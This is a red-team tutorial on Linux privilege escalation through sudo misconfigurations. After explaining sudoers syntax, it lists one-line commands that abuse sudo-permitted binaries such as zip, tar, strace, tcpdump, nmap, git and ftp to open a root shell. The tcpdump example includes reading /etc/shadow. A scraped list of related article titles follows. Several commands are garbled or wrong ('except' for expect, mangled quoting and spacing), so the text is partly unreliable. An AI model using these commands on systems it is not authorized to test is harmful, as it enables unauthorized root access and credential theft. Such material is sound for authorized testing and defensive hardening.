Abusing SUDO Advance for Linux Privilege Escalation
Index
- What is SUDO?
- Scenario.
- Sudoer FIle Syntax.
- Exploiting SUDO
- zip
- tar
- strace
- tcpdump
- nmap
- scp
- except
- nano & pico
- git
- ftp/gdb
What is SUDO ??
The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers
file.
Scenario.
During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.
Sudoer File Syntax.
root ALL=(ALL) ALL
Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
The first part is the user, the second is the terminal from where the user can use the sudo
command, the third part is which users he may act as, and the last one is which commands he may run when using.sudo
touhid ALL= /sbin/poweroff
Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.
touhid ALL = (root) NOPASSWD: /usr/bin/find
Explain 3: The above command, make the user touhid can from any terminal, run the command find as root user without password.
Exploiting SUDO Users.
To Exploiting sudo user u need to find which command u have to allow.
sudo -l
The above command shows which command have allowed to the current user.
Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.
Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.
Using zip command
$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
Using tar command
$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash
Using strace command
$ sudo strace -o/dev/null /bin/bash
Using tcpdump command
$ echo $’id\ncat /etc/shadow’ > /tmp/.shell $ chmod +x /tmp/.shell $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
Using nmap command
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse $ sudo nmap --script=/tmp/shell.nse
Using scp command
$ sudo scp -S /path/yourscript x y
Using except command
$ sudo except spawn sh then sh
Using nano command
$ sudo nano -S /bin/bash
type your command and hit CTRL+T
Using git command
$ sudo git help status
type: !/bin/bash
Using gdb/ftp command
$ sudo ftp
type : !/bin/sh
Abusing SUDO Advance for Linux Privilege Escalation相关推荐
- Basic Linux Privilege Escalation
原文链接: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Basic Linux Privilege Escal ...
- Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...
- Linux/Unix System Level Attack、Privilege Escalation(undone)
目录 1. How To Start A System Level Attack 2. Remote Access Attack 3. Local Access Attack 4. After Get ...
- Ansible Privilege Escalation
become 为另一个用户,不同于登录的用户,比如-u或者ansible_ssh_user,而是类似于sudo,su Directives 参数 描述 become set to yes to act ...
- MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> 以下消息来自幻 ...
- ansible问题记录--Timeout (12s) waiting for privilege escalation prompt
问题描述 在项目中使用ansible做批量操作,但是环境限制只能用非root用户访问,然后才能切root权限.配置好hostfile之后,使用报错: 10.219.19.116 | FAILED! = ...
- Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)
insight-labs · 2015/02/06 14:24 from:http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerabi ...
- qt执行linux sudo命令语句,linux命令_sudo
linux命令_sudo 作者:admin sudo === 以其他身份来执行命令 ## 补充说明 **sudo命令** 用来以其他身份来执行命令,预设的身份为root.在`/etc/sudoers` ...
- sudo apt get linux,常用sudo apt-get命令
常用sudo apt-get命令 (2018-02-22 13:08:06) 标签: it 大学 linux 杂谈 在操作系统Linux中,有些常用sudo apt-get命令需要熟记并使用. 1.s ...
最新文章
- c语言分隔符分离出str字符串中的数字,C语言版Tokenize()函数,由分隔符获取字符串...
- {网络编程}和{多线程}应用:基于TCP协议【实现多个客户端发送文件给一个服务器端】--练习
- Python、Perl 垫底,C语言才是最环保的编程语言
- CENTOS 7 踢用户_从零学ELK系列(三):Centos安装Docker(超详细图文教程)
- Java ObjectStreamField getOffset()方法与示例
- 干货:不同场景容器内获取客户端源IP的方法
- 加州大学欧文分校 计算机专业,UCI的Computer Science「加州大学欧文分校计算机科学系」...
- java回收内存_JAVA之内存回收
- 49.把字符串转换成整数
- assign ur here php,ecshop源码分析01
- Open Inventor:Windows下编译安装Coin3D
- 计算机毕业设计ssm智能停车场管理系统
- suse linux 11 sp3 的安装
- [Linux command]批处理注释
- 看完这篇解决你99%的运维安全陋习,快别踩坑了!
- 文旅展演专业委员会成功换届,为文旅展演导入新活力
- 蛋壳梦破:CEO被限制消费,资金链碎了一地
- Python 多进程与数据库连接池配合同时取出数据进行处理
- 深圳求职指南(2004版)
- cms织梦文件夹目录